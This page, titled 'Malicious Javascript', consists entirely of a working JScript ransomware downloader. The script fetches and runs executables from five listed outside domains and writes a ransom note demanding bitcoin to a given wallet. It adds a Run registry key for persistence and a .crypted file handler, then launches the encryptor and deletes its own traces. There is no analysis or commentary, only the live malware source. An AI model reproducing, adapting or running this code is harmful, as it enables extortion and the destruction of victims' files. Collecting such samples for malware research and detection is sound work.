Malicious Javascript

1. var id="LRYB9RcpANpqAc9lNDOe_7o65Gns30h8ZhRx1DBunTW-YHmZvSONzPHomHt9FRlRl53IG-8U9s47bw"; var ad="15R1q8XJmfZUGNy4cWGocZBEVeMsXfECpZ"; var bc="0.54235"; var ld=0; var cq=String.fromCharCode(34); var cs=String.fromCharCode(92); var ll=["opros.mskobr.ru","alacahukuk.com","www.ortoservis.ru","aksoypansiyon.com","samurkasgrup.com"]; var ws=WScript.CreateObject("WScript.Shell"); var fn=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"a"; var pd=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php4ts.dll"; var xo=WScript.CreateObject("Msxml2.XMLHTTP"); var xa=WScript.CreateObject("ADODB.Stream"); var fo=WScript.CreateObject("Scripting.FileSystemObject"); if (!fo.FileExists(fn+".txt")) { for(var n=1;n<=5;n++) { for(var i=ld;i<ll.length;i++) { var dn=0; try { xo.open("GET","http://"+ll[i]+"/counter/?ad="+ad+"&id="+id+"&rnd="+i+n, false); xo.send(); if(xo.status==200) { xa.open(); xa.type=1; xa.write(xo.responseBody); if(xa.size>1000) { dn=1; if(n<=2){xa.saveToFile(fn+n+".exe",2);try{ws.Run(fn+n+".exe",1,0);}catch(er){};} else if(n==3){xa.saveToFile(fn+".exe",2);} else if(n==4){xa.saveToFile(pd,2);} else if(n==5){xa.saveToFile(fn+".php",2);} }; xa.close(); }; if(dn==1){ld=i;break;}; } catch(er){}; }; }; if(fo.FileExists(fn+".exe") && fo.FileExists(pd) && fo.FileExists(fn+".php")) { var fp=fo.CreateTextFile(fn+".txt",true); fp.WriteLine("ATTENTION!"); fp.WriteLine(""); fp.WriteLine("All your documents, photos, databases and other important personal files"); fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key."); fp.WriteLine("To restore your files you have to pay "+bc+" BTC (bitcoins)."); fp.WriteLine("Please follow this manual:"); fp.WriteLine(""); fp.WriteLine("1. Create Bitcoin wallet here:"); fp.WriteLine(""); fp.WriteLine("      https://blockchain.info/wallet/new"); fp.WriteLine(""); fp.WriteLine("2. Buy "+bc+" BTC with cash, using search here:"); fp.WriteLine(""); fp.WriteLine("      https://localbitcoins.com/buy_bitcoins"); fp.WriteLine(""); fp.WriteLine("3. Send "+bc+" BTC to this Bitcoin address:"); fp.WriteLine(""); fp.WriteLine("      "+ad); fp.WriteLine(""); fp.WriteLine("4. Open one of the following links in your browser to download decryptor:"); fp.WriteLine(""); for (var i=0;i<ll.length;i++) { fp.WriteLine("      http://"+ll[i]+"/counter/?a="+ad); }; fp.WriteLine(""); fp.WriteLine("5. Run decryptor to restore your files."); fp.WriteLine(""); fp.WriteLine("PLEASE REMEMBER:"); fp.WriteLine(""); fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES."); fp.WriteLine("      - Nobody can help you except us."); fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc."); fp.WriteLine("      - Your files can be decrypted only after you make payment."); fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt)."); fp.Close(); ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCU"+cs+"SOFTWARE"+cs+"Microsoft"+cs+"Windows"+cs+"CurrentVersion"+cs+"Run"+cq+" /V "+cq+"Crypted"+cq+" /t REG_SZ /F /D "+cq+fn+".txt"+cq,0,0); ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+".crypted"+cq+" /ve /t REG_SZ /F /D "+cq+"Crypted"+cq,0,0); ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+"Crypted"+cs+"shell"+cs+"open"+cs+"command"+cq+" /ve /t REG_SZ /F /D "+cq+"notepad.exe "+cs+cq+fn+".txt"+cs+cq+cq,0,0); ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%AppData%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0); ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%UserProfile%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0); ws.Run("%COMSPEC% /c "+fn+".exe "+cq+fn+".php"+cq,0,1); ws.Run("%COMSPEC% /c notepad.exe "+cq+fn+".txt"+cq,0,0); var fp=fo.CreateTextFile(fn+".php",true);for(var i=0;i<1000;i++){fp.WriteLine(ad);};fp.Close(); ws.Run("%COMSPEC% /c DEL "+cq+fn+".php"+cq,0,0); ws.Run("%COMSPEC% /c DEL "+cq+fn+".exe"+cq,0,0); ws.Run("%COMSPEC% /c DEL "+cq+pd+cq,0,0); }; };